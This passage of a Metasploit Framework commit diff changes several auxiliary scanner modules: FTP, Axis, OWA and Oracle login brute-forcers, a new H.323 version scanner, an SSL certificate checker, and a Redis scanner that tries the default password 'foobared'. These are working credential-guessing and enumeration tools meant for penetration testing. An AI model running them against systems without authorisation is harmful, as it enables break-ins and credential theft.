ret = recv_ftp_resp(nsock)
ret = [ ret, data ]
ret
end
end

18
modules/auxiliary/scanner/ftp/ftp_login.rb
View File

@ -42,7 +42,8 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
Opt::RPORT(21)
Opt::RPORT(21),
OptBool.new('RECORD_GUEST', [ false, "Record anonymous/guest logins to the database", false])
], self.class)
register_advanced_options(
@ -52,11 +53,18 @@ class Metasploit3 < Msf::Auxiliary
)
deregister_options('FTPUSER','FTPPASS') # Can use these, but should use 'username' and 'password'
@accepts_all_logins = {}
end
def run_host(ip)
print_status("#{ip}:#{rport} - Starting FTP login sweep")
if check_banner
if datastore['RECORD_GUEST'] == false and check_anonymous == :next_user
@accepts_all_logins[@access] ||= []
@accepts_all_logins[@access] << ip
print_status("Successful authentication with #{@access.to_s} access on #{ip} will not be reported")
end
each_user_pass { |user, pass|
next if user.nil?
ret = do_login(user,pass)
@ -69,11 +77,15 @@ class Metasploit3 < Msf::Auxiliary
print_status("Username #{user} is not case sensitive")
end
end
report_ftp_creds(user,pass,@access)
if datastore['RECORD_GUEST']
report_ftp_creds(user,pass,@access)
else
report_ftp_creds(user,pass,@access) unless @accepts_all_logins[@access].include?(ip)
end
end
ret
}
check_anonymous
# check_anonymous
else
return
end

576
modules/auxiliary/scanner/h323/h323_version.rb Normal file
View File

@ -0,0 +1,576 @@
##
# $Id: ftp_version.rb 9804 2010-07-13 18:52:27Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'H.323 Version Scanner',
'Version' => '$Revision: 9804 $',
'Description' => 'Detect H.323 Version.',
'Author' => 'hdm',
'License' => MSF_LICENSE,
)
register_options(
[
Opt::RPORT(1720),
], self.class)
end
def run_host(ip)
remote_display = nil
remote_product_id = nil
remote_version_id = nil
remote_vendor_id = nil
remote_protocol = nil
begin
# Wrap this in a timeout to prevent dead services from
# hanging this thread.
Timeout.timeout( call_timeout) do
connect
caller_name = "SYSTEM\x00"
h323_id = Rex::Text.rand_text_alpha(3)
vendor_id = Rex::Text.rand_text_alpha(32)
caller_host = Rex::Socket.source_address( ip )
caller_port = rand( 32768 ) + 30000
callee_host = rhost
callee_port = rport
conf_guid = Rex::Text.rand_text(16)
call_guid = Rex::Text.rand_text(16)
pkt_setup = h323_setup_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid)
res = sock.put(pkt_setup) rescue nil
if not res
disconnect
return
end
cnt = 0
while( true )
info = read_packet
break if not info
# The remote side of the call disconnected us
break if info[:type] == @@H323_STATUS_RELEASE_COMPLETE
remote_display = info[40].strip if info[40]
remote_product_id = info[:product_id].strip if info[:product_id]
remote_version_id = info[:version_id].strip if info[:version_id]
remote_protocol = info[:protocol_version].strip if info[:protocol_version]
if info[:vendor_id] and [nil, "Unknown"].include?( remote_vendor_id )
remote_vendor_id = info[:vendor_id].strip
end
# Diagnostics
# print_status("Host: #{rhost}:#{rport} => #{info.inspect}")
# The remote side of the call was connected (kill it)
break if info[:type] == @@H323_STATUS_CONNECT
# Exit if we already received 5 packets from the server
break if (cnt +=1) > 5
end
# Make sure the call was shut down cleanly
pkt_release = h323_release_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid)
sock.put(pkt_release) rescue nil
# End timeout block
end
rescue ::Timeout::Error
rescue ::Interrupt
raise $!
rescue ::Rex::ConnectionError, ::IOError, ::Errno::ECONNRESET, ::Errno::ENOPROTOOPT
rescue ::Exception
print_error("#{rhost}:#{rport} #{$!.class} #{$!} #{$!.backtrace}")
ensure
disconnect
end
if remote_vendor_id
remote_product_id = remote_product_id.to_s.gsub(/[^\x20-\x7e]/, '')
remote_version_id = remote_version_id.to_s.gsub(/[^\x20-\x7e]/, '')
banner = "Protocol: #{ remote_protocol } VendorID: #{ remote_vendor_id } "
if remote_version_id and remote_version_id.length > 0
banner << "VersionID: #{ remote_version_id } "
end
if remote_product_id and remote_product_id.length > 0
banner << "ProductID: #{ remote_product_id } "
end
if remote_display and remote_display.length > 0
remote_display = remote_display.to_s.gsub(/[^\x20-\x7e]/, '')
banner << "DisplayName: #{ remote_display }"
end
print_status("#{rhost}:#{rport} #{banner}")
report_service(:host => rhost, :port => rport, :name => "h323", :info => banner)
end
end
def read_packet
begin
::Timeout.timeout( read_timeout ) do
ver = sock.read(2)
return if not (ver and ver == "\x03\x00")
bin = sock.read(2)
return if not bin
len = [ bin.unpack("n")[0] - 4, 0 ].max
return if len == 0
bin = sock.read(len)
return if not bin
f_desc, cref_len = bin.unpack("CC")
cref_val = bin[2, cref_len]
f_type = bin[2 + cref_len, 1].unpack("C")[0]
return { :type => f_type, :call_ref => cref_val }.merge( read_ies(f_type, bin[ 2 + cref_len + 1, bin.length] ) )
end
rescue ::Timeout::Error
end
nil
end
def read_ies(mtype, data)
r = { }
i = 0
while( i < (data.length - 1) )
ie_type = data[i, 1].unpack("C")[0]
break if not ie_type
ie_len = 0
ie_data = ""
case ie_type
when @@H225_IE_USER_USER
ie_len = data[i+1, 2].unpack("n")[0]
break if not ie_len
ie_data = data[i+3, ie_len]
break if not ie_data
i = i + 3 + ie_len
else
ie_len = data[i+1, 1].unpack("C")[0]
break if not ie_len
ie_data = data[i+2, ie_len]
break if not ie_data
i = i + 2 + ie_len
end
r[ ie_type ] = ie_data
if ie_type == @@H225_IE_USER_USER
r.merge!( ( read_user_user(mtype, ie_data) rescue {} ) )
end
end
r
end
# This provides a weak method of decoding USER-USER PDUs. These are
# actually PER-encoded ASN.1, but we take a few shortcuts since PER
# encoding is such a pain.
def read_user_user(mtype, data)
r = {}
# Identify the embedded version (2/3/4/5/6 commonly found)
i = data.index("\x00\x08\x91\x4a\x00")
return r if not i
# Store the protocol version
pver = data[i + 5, 1].unpack("C")[0]
r[:protocol_version] = pver.to_s
# Bump the index over the version
i+= 6
# print_line( Rex::Text.to_hex_dump( data[i, 32] ) )
# Set a placeholder VendorID so this system will be reported
r[:vendor_id] = "Unknown"
# We use the version offset to identify the destination block location
# This changes slightly based on the type of packet we receive
case mtype
when @@H323_STATUS_ALERTING, @@H323_STATUS_PROCEEDING
if pver == 2 and data[i, 2] == "\x20\x00"
r[ :vendor_id ] = "0x%.8x" % ( data[i + 2, 4].unpack("N")[0] rescue 0 )
return r
end
# Find the offset to the VendorID
if data[i + 1, 1] != "\xc0"
i+= 7
end
# Stop processing if we can't identify a VendorID
return r if data[i + 1, 1] != "\xc0"
# Otherwise just add 2 to the offset of the version
i += 2
when @@H323_STATUS_CONNECT
# Bail early in some corner cases
return r if data[i, 1] == "\x00"
# Find the offset to the VendorID
if data[i + 1, 1] != "\xc0"
i+= 7
end
# Stop processing if we can't identify a VendorID
return r if data[i + 1, 1] != "\xc0"
i += 2
return r
else
return r
end
# Extract the manufacturer ID
r[ :vendor_id ] = "0x%.8x" % ( data[i, 4].unpack("N")[0] rescue 0 )
i+= 4
# No Product ID / Version ID in versions less than 3 (unless special cased above)
return r if pver < 3
# Get the product_id length (-1)
product_id_length = data[i, 1].unpack("C")[0] + 1
i+= 1
# Extract the product ID
r[ :product_id ] = data[i, product_id_length]
i+= product_id_length
# Get the version ID length (-1)
version_id_length = data[i, 1].unpack("C")[0] + 1
i+= 1
# Extract the version ID
r[ :version_id ] = data[i, version_id_length]
# Thats it for now
r
end
def read_timeout
10
end
def call_timeout
30
end
@@H225_IE_BEARER_CAP = 0x04
@@H225_IE_DISPLAY = 0x28
@@H225_IE_USER_USER = 0x7e # Yes, really User-user
@@H323_STATUS_ALERTING = 0x01
@@H323_STATUS_PROCEEDING = 0x02
@@H323_STATUS_SETUP = 0x05
@@H323_STATUS_SETUP_ACK = 0x0D
@@H323_STATUS_CONNECT = 0x07
@@H323_STATUS_RELEASE_COMPLETE = 0x5a
@@H323_STATUS_FACILITY = 0x1c
def encap_tpkt(ver,data)
[ ver, 0, data.length + 4 ].pack("CCn") + data
end
def encap_q225(desc, cref_value, msg_type, data)
[ desc, cref_value.length, cref_value, msg_type].pack("CCA*C") + data
end
def encap_q225_standard(msg_type, data)
encap_q225(0x08, [0x733f].pack("n"), msg_type, data)
end
def encap_q225_setup(data)
encap_q225_standard(0x05, data)
end
def encap_q225_release(data)
encap_q225_standard(0x5a, data)
end
def create_ie_byte(ie_type, data)
[ie_type, data.length].pack("CC") + data
end
def create_ie_short(ie_type, data)
[ie_type, data.length].pack("Cn") + data
end
def create_ie_bearer_capability(cap = 0x00038893)
create_ie_byte( @@H225_IE_BEARER_CAP, [cap].pack("N")[0,3] )
end
def create_ie_display(name = "DEBUG\x00")
create_ie_byte( @@H225_IE_DISPLAY, name )
end
def create_ie_user_user(data)
create_ie_short( @@H225_IE_USER_USER, data )
end
#
# This is ugly. Doing it properly requires a PER capable ASN.1 encoder, which is overkill for this task
#
def create_user_info(h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid)
buff = "\x05" # Protocol descriminator: X.208/X.209 coded user information
buff << "\x20\xa8\x06\x00\x08\x91\x4a\x00\x06\x01\x40\x02"
# H323-ID
buff << h323_id.unpack("C*").pack("n*")
buff << "\x22\xc0\x09\x00\x00\x3d\x02\x00\x00\x00\x21"
# VENDOR: 32 + 2 null bytes
buff << [vendor_id].pack("Z32") + "\x00\x00"
buff << "\x00"
# Remote IP + Remote Port
buff << ( ::Rex::Socket.addr_aton( callee_host ) + [ callee_port.to_i ].pack("n") )
buff << "\x00"
# Conference GUID
buff << conf_guid
buff << "\x00\xc5\x1d\x80\x04\x07\x00"
# Local IP + Port
buff << ( ::Rex::Socket.addr_aton( caller_host ) + [ caller_port.to_i ].pack("n") )
buff << "\x11\x00"
# Call GUID
buff << call_guid
buff <<
"\x82\x49\x10\x47\x40\x00\x00\x06\x04\x01\x00\x4c\x10\xb5" +
"\x00\x00\x26\x25\x73\x70\x65\x65\x78\x20\x73\x72\x3d\x31" +
"\x36\x30\x30\x30\x3b\x6d\x6f\x64\x65\x3d\x36\x3b\x76\x62" +
"\x72\x3d\x6f\x66\x66\x3b\x63\x6e\x67\x3d\x6f\x66\x66\x80" +
"\x12\x1c\x40\x01\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc6\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc7\x90\x3c\x00\x00\x64\x0c\x10\xb5\x00\x00\x26\x25" +
"\x73\x70\x65\x65\x78\x20\x73\x72\x3d\x31\x36\x30\x30\x30" +
"\x3b\x6d\x6f\x64\x65\x3d\x36\x3b\x76\x62\x72\x3d\x6f\x66" +
"\x66\x3b\x63\x6e\x67\x3d\x6f\x66\x66\x80\x0b\x0d\x40\x01" +
"\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc7\x48\x31\x40\x00\x00\x06\x04\x01\x00\x4c\x10\x09" +
"\x00\x00\x3d\x0f\x53\x70\x65\x65\x78\x20\x62\x73\x34\x20" +
"\x57\x69\x64\x65\x36\x80\x12\x1c\x40\x01\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc6\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc7\xa0\x26\x00\x00\x65\x0c\x10\x09\x00\x00\x3d\x0f" +
"\x53\x70\x65\x65\x78\x20\x62\x73\x34\x20\x57\x69\x64\x65" +
"\x36\x80\x0b\x0d\x40\x01\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc7\x50\x1d\x40\x00\x00\x06\x04\x01\x00\x4c\x60\x13" +
"\x80\x11\x1c\x00\x01\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc6\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc7\x13\x00\x00\x66\x0c\x60\x13\x80\x0b\x0d\x00\x01" +
"\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc7\x00\x1d\x40\x00\x00\x06\x04\x01\x00\x4c\x20\x13" +
"\x80\x11\x1c\x00\x01\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc6\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc7\x13\x00\x00\x67\x0c\x20\x13\x80\x0b\x0d\x00\x01" +
"\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc7\x00\x23\x40\x00\x00\x06\x04\x01\x00\x48\x78\x00" +
"\x4a\xff\x00\x80\x01\x00\x80\x11\x1c\x00\x02\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc8\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc9\x19\x00\x00\x68\x08\x78\x00\x4a\xff\x00\x80\x01" +
"\x00\x80\x0b\x0d\x00\x02\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc9\x00\x22\x40\x00\x00\x06\x04\x01\x00\x48\x68\x4a" +
"\xff\x00\x80\x01\x00\x80\x11\x1c\x00\x02\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc8\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc9\x18\x00\x00\x69\x08\x68\x4a\xff\x00\x80\x01\x00" +
"\x80\x0b\x0d\x00\x02\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc9\x00\x22\x40\x00\x00\x06\x04\x01\x00\x48\x70\x4a" +
"\xff\x00\x80\x01\x00\x80\x11\x1c\x00\x02\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc8\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc9\x18\x00\x00\x6a\x08\x70\x4a\xff\x00\x80\x01\x00" +
"\x80\x0b\x0d\x00\x02\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc9\x00\x2c\x40\x00\x00\x06\x04\x01\x00\x48\xee\x00" +
"\x00\x20\x9f\xff\x20\x50\x40\x01\x00\x80\x17\x1c\x20\x02" +
"\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc8\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc9\x80\x04\x48\x08\x8d\x44\x22\x00\x00\x6b\x08\xee" +
"\x00\x00\x20\x9f\xff\x20\x50\x40\x01\x00\x80\x11\x0d\x20" +
"\x02\x00" +
Rex::Socket.addr_aton( caller_host ) +
"\x13\xc9\x40\x00\x04\x48\x08\x8d\x44\x01\x00\x01\x00\x01" +
"\x00\x01\x00\x80\xfa\x02\x80\xef\x02\x70\x01\x06\x00\x08" +
"\x81\x75\x00\x0d\x80\x1a\x80\x01\xf4\x00\x01\x00\x00\x01" +
"\x00\x00\x01\x00\x04\x02\x05\x00\x48\x08\x8d\x44\x06\x60" +
"\x01\x00\x01\x80\x0b\x80\x00\x00\x20\x20\xb5\x00\x00\x26" +
"\x25\x73\x70\x65\x65\x78\x20\x73\x72\x3d\x31\x36\x30\x30" +
"\x30\x3b\x6d\x6f\x64\x65\x3d\x36\x3b\x76\x62\x72\x3d\x6f" +
"\x66\x66\x3b\x63\x6e\x67\x3d\x6f\x66\x66\x80\x00\x01\x20" +
"\x20\x09\x00\x00\x3d\x0f\x53\x70\x65\x65\x78\x20\x62\x73" +
"\x34\x20\x57\x69\x64\x65\x36\x80\x00\x02\x20\xc0\xef\x80" +
"\x00\x03\x20\x40\xef\x80\x00\x04\x08\xf0\x00\x4a\xff\x00" +
"\x80\x01\x00\x80\x00\x05\x08\xd0\x4a\xff\x00\x80\x01\x00" +
"\x80\x00\x06\x08\xe0\x4a\xff\x00\x80\x01\x00\x80\x00\x07" +
"\x09\xdc\x00\x00\x40\x9f\xff\x20\x50\x40\x01\x00\x80\x00" +
"\x08\x83\x01\x50\x80\x00\x09\x83\x01\x10\x80\x00\x0a\x83" +
"\x01\x40\x80\x00\x0b\x8a\x0c\x14\x0a\x30\x2d\x31\x36\x2c" +
"\x33\x32\x2c\x33\x36\x00\x80\x01\x03\x03\x00\x00\x00\x01" +
"\x00\x02\x00\x03\x03\x00\x04\x00\x05\x00\x06\x00\x07\x00" +
"\x00\x08\x02\x00\x09\x00\x0a\x00\x0b\x07\x01\x00\x32\x80" +
"\x96\x61\x41\x02\x80\x01\x80"
buff
end
def create_user_release_info(call_guid)
"\x05" +
"\x25\x80\x06\x00\x08\x91\x4a\x00\x05\x01\x11\x00" +
call_guid +
"\x02\x80\x01\x00"
end
def h323_release_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid)
encap_tpkt(3,
encap_q225_release(
create_ie_display(caller_name) +
create_ie_user_user(
create_user_release_info(call_guid )
)
)
)
end
def h323_setup_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid)
encap_tpkt(3,
encap_q225_setup(
create_ie_bearer_capability() +
create_ie_display(caller_name) +
create_ie_user_user(
create_user_info( h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid )
)
)
)
end
end

4
modules/auxiliary/scanner/http/axis_login.rb
View File

@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run_host(ip)
print_status("Verifying login exists at #{target_url}")
begin
res = send_request_cgi({
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("The Axis2 login page does not exist at #{target_url}")
return
end
print_status "#{target_url} - Apache Axis - Attempting authentication"
each_user_pass { |user, pass|

2
modules/auxiliary/scanner/http/open_proxy.rb
View File

@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
OptBool.new('VERIFY_CONNECT', [ false, 'Enable test for CONNECT method', false ]),
OptBool.new('VERIFY_HEAD', [ false, 'Enable test for HEAD method', false ]),
OptBool.new('LOOKUP_PUBLIC_ADDRESS', [ false, 'Enable test for retrieve public IP address via RIPE.net', false ]),
OptString.new('SITE', [ true, 'The web site to test via alleged web proxy (default is www.google.com)', '209.85.135.147' ]),
OptString.new('SITE', [ true, 'The web site to test via alleged web proxy (default is www.google.com)', '209.85.148.147' ]),
OptString.new('ValidCode', [ false, "Valid HTTP code for a successfully request", '200,302' ]),
OptString.new('ValidPattern', [ false, "Valid HTTP server header for a successfully request", 'server: gws' ]),
OptString.new('UserAgent', [ true, 'The HTTP User-Agent sent in the request', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),

41
modules/auxiliary/scanner/http/owa_login.rb
View File

@ -47,6 +47,17 @@ class Metasploit3 < Msf::Auxiliary
datastore['BLANK_PASSWORDS'] = false # OWA doesn't support blank passwords
vhost = datastore['VHOST'] || datastore['RHOST']
print_status("#{msg} Testing version #{datastore['VERSION']}")
# Here's a weird hack to check if each_user_pass is empty or not
# apparently you cannot do each_user_pass.empty? or even inspect() it
isempty = true
each_user_pass do |user|
isempty = false
break
end
print_error("No username/password specified") if isempty
if datastore['VERSION'] == '2003'
authPath = '/exchweb/bin/auth/owaauth.dll'
inboxPath = '/exchange/'
@ -58,21 +69,19 @@ class Metasploit3 < Msf::Auxiliary
elsif datastore['VERSION'] == '2010'
authPath = '/owa/auth.owa' # Post creds here
inboxPath = '/owa/' # Get request with cookie/sessionid
loginCheck = /Inbox/ # check result
loginCheck = /Inbox|location(\x20*)=(\x20*)"\\\/(\w+)\\\/logoff\.owa|A mailbox couldn\'t be found/ # check result
else
print_error('Invalid Version, Select 2003, 2007, or 2010')
print_error('Invalid VERSION, select one of 2003, 2007, or 2010')
return
end
print_status("Testing OWA: version #{datastore['VERSION']} against #{vhost}:#{datastore['RPORT'].to_s}")
begin
each_user_pass do |user, pass|
vprint_status("Trying #{user} : #{pass}")
vprint_status("#{msg} Trying #{user} : #{pass}")
try_user_pass(user, pass, authPath, inboxPath, loginCheck, vhost)
end
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED
print_error('HTTP Connection Error, Aborting')
print_error("#{msg} HTTP Connection Error, Aborting")
end
end
@ -98,17 +107,17 @@ class Metasploit3 < Msf::Auxiliary
}, 20)
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
print_error('HTTP Connection Failed, Aborting')
print_error("#{msg} HTTP Connection Failed, Aborting")
return :abort
end
if not res
print_error('HTTP Connection Error, Aborting')
print_error("#{msg} HTTP Connection Error, Aborting")
return :abort
end
if not res.headers['set-cookie']
print_error('Received Invalid Repsonse due to a missing cookie (Possibly Due To Invalid Version), Aborting')
print_error("#{msg} Received invalid repsonse due to a missing cookie (possibly due to invalid version), aborting")
return :abort
end
@ -125,22 +134,22 @@ class Metasploit3 < Msf::Auxiliary
'headers' => headers
}, 20)
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
print_error('HTTP Connection Failed, Aborting')
print_error("#{msg} HTTP Connection Failed, Aborting")
return :abort
end
if not res
print_error('HTTP Connection Error, Aborting')
print_error("#{msg} HTTP Connection Error, Aborting")
return :abort
end
if res.code == 302
vprint_error("FAILED LOGIN. #{user} : #{pass}")
vprint_error("#{msg} FAILED LOGIN. '#{user}' : '#{pass}'")
return :skip_pass
end
if res.body =~ loginCheck
print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
print_good("#{msg} SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
report_hash = {
:host => datastore['RHOST'],
@ -154,9 +163,13 @@ class Metasploit3 < Msf::Auxiliary
report_auth_info(report_hash)
return :next_user
else
vprint_error("FAILED LOGIN. #{user} : #{pass}")
vprint_error("#{msg} FAILED LOGIN. '#{user}' : '#{pass}'")
return :skip_pass
end
end
def msg
"#{vhost}:#{rport} OWA -"
end
end

32
modules/auxiliary/scanner/http/ssl.rb
View File

@ -11,7 +11,7 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::WMAPScanSSL
@ -25,13 +25,16 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'HTTP SSL Certificate Information',
'Version' => '$Revision$',
'Description' => 'Parse the server SSL certificate to obtain the common name and signature algorithm',
'Author' => 'et',
'Author' =>
[
'et', #original module
'Chris John Riley', #additions
],
'License' => MSF_LICENSE
)
register_options([
Opt::RPORT(443)
], self.class)
end
# Fingerprint a single host
@ -39,14 +42,30 @@ class Metasploit3 < Msf::Auxiliary
begin
connect
connect(true, {"SSL" => true}) #Force SSL
cert = OpenSSL::X509::Certificate.new(sock.peer_cert)
disconnect
if cert
print_status("#{ip}:#{rport} Subject: #{cert.subject} Signature Alg: #{cert.signature_algorithm}")
print_status("#{ip}:#{rport} Subject: #{cert.subject}")
print_status("#{ip}:#{rport} Issuer: #{cert.issuer}")
print_status("#{ip}:#{rport} Signature Alg: #{cert.signature_algorithm}")
# Checks for common properties of self signed certificates
caissuer = (/CA Issuers - URI:(.*?),/i).match(cert.extensions.to_s)
if caissuer.to_s.empty?
print_good("Certificate contains no CA Issuers extension... possible self signed certificate")
else
print_status("#{ip}:#{rport} " +caissuer.to_s[0..-2])
end
if cert.issuer.to_s == cert.subject.to_s
print_good("Certificate Subject and Issuer match... possible self signed certificate")
end
alg = cert.signature_algorithm
if alg.downcase.include? "md5"
@ -100,5 +119,4 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
end

178
modules/auxiliary/scanner/misc/redis_server.rb
View File

@ -1,89 +1,89 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::Tcp
def initialize(info={})
super(update_info(info,
'Name' => 'Redis-server Scanner',
'Version' => '$Revision$',
'Description' => %q{
This module scans for Redis server. By default Redis has no auth. If auth
(password only) is used, it is then possible to execute a brute force attack on
the server. This scanner will find open or password protected Redis servers and
report back the server information
},
'Author' => [ 'iallison <ian[at]team-allison.com>' ],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(6379),
], self.class)
deregister_options('RHOST')
end
def run_host(ip)
print_status("Scanning IP: #{ip.to_s}")
begin
pkt = "PING" + "\n"
connect()
sock.puts(pkt)
res = sock.recv(1024)
if res =~ /PONG/
info = "INFO"
sock.puts(info)
data = sock.recv(1024)
print_status("Redis Server Information #{data}")
data_sanitized = data.to_s
elsif res =~ /ERR/
auth = "AUTH foobared" + "\n"
sock.puts(auth)
data = sock.recv(1024)
print_status("Response: #{data.chop}")
if data =~ /\-ERR\sinvalid\spassword/
print_status("Redis server is using AUTH")
else
print_good("Redis server is using the default password of foobared")
report_note(
:host => rhost,
:port => rport,
:type => 'password',
:data => 'foobared'
)
end
else
print_error "#{ip} does not have a Redis server"
end
report_service(
:host => rhost,
:port => rport,
:name => "redis server",
:info => data_sanitized
)
disconnect
rescue ::Exception => e
print_error "Unable to connect: #{e.to_s}"
end
end
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::Tcp
def initialize(info={})
super(update_info(info,
'Name' => 'Redis-server Scanner',
'Version' => '$Revision$',
'Description' => %q{
This module scans for Redis server. By default Redis has no auth. If auth
(password only) is used, it is then possible to execute a brute force attack on
the server. This scanner will find open or password protected Redis servers and
report back the server information
},
'Author' => [ 'iallison <ian[at]team-allison.com>' ],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(6379),
], self.class)
deregister_options('RHOST')
end
def run_host(ip)
print_status("Scanning IP: #{ip.to_s}")
begin
pkt = "PING" + "\n"
connect()
sock.puts(pkt)
res = sock.recv(1024)
if res =~ /PONG/
info = "INFO"
sock.puts(info)
data = sock.recv(1024)
print_status("Redis Server Information #{data}")
data_sanitized = data.to_s
elsif res =~ /ERR/
auth = "AUTH foobared" + "\n"
sock.puts(auth)
data = sock.recv(1024)
print_status("Response: #{data.chop}")
if data =~ /\-ERR\sinvalid\spassword/
print_status("Redis server is using AUTH")
else
print_good("Redis server is using the default password of foobared")
report_note(
:host => rhost,
:port => rport,
:type => 'password',
:data => 'foobared'
)
end
else
print_error "#{ip} does not have a Redis server"
end
report_service(
:host => rhost,
:port => rport,
:name => "redis server",
:info => data_sanitized
)
disconnect
rescue ::Exception => e
print_error "Unable to connect: #{e.to_s}"
end
end
end

59
modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
View File

@ -88,7 +88,14 @@ class Metasploit3 < Msf::Auxiliary
res.body = res.bufq
end
sid = res.body.scan(/<GLOBAL_NAME>(\S+)<\/GLOBAL_NAME>/)[0]
report_note(:host => ip, :proto => 'tcp', :port => datastore['RPORT'], :type => 'SERVICE_NAME', :data => "#{sid}", :update => :unique_data)
report_note(
:host => ip,
:proto => 'tcp',
:port => datastore['RPORT'],
:type => 'SERVICE_NAME',
:data => "#{sid}",
:update => :unique_data
)
print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}")
users.push(user_pass)
else
@ -125,7 +132,15 @@ class Metasploit3 < Msf::Auxiliary
p = e.elements['PRODUCT'].get_text
v = e.elements['VERSION'].get_text
s = e.elements['STATUS'].get_text
report_note(:host => datastore['RHOST'], :sname => 'XDB', :proto => 'tcp', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{p}#{v}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:sname => 'XDB',
:proto => 'tcp',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Component Version: #{p}#{v}",
:update => :unique_data
)
print_good("\t#{p}\t\t#{v}\t(#{s})")
end
@ -155,7 +170,15 @@ class Metasploit3 < Msf::Auxiliary
doc.elements.each('ALL_REGISTRY_BANNERS/ROW') do |e|
next if e.elements['BANNER'] == nil
b = e.elements['BANNER'].get_text
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{b}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'XDB',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Component Version: #{b}",
:update => :unique_data
)
print_good("\t#{b}")
end
end
@ -195,7 +218,15 @@ class Metasploit3 < Msf::Auxiliary
if(sid and sid != "")
print_good("\tLink: #{d}\t#{us}\@#{h[0]}/#{sid[0]}")
report_note(:host => h[0], :proto => 'tcp', :port => datastore['RPORT'], :sname => 'XDB', :type => 'oracle_sid', :data => "#{sid}", :update => :unique_data)
report_note(
:host => h[0],
:proto => 'tcp',
:port => datastore['RPORT'],
:sname => 'XDB',
:type => 'oracle_sid',
:data => "#{sid}",
:update => :unique_data
)
else
print_good("\tLink: #{d}\t#{us}\@#{h}")
end
@ -233,9 +264,25 @@ class Metasploit3 < Msf::Auxiliary
print_good("\t#{us}:#{h}:#{as}")
good = true
if(as.to_s == "OPEN")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Active Account #{u}:#{h}:#{as}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'XDB',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
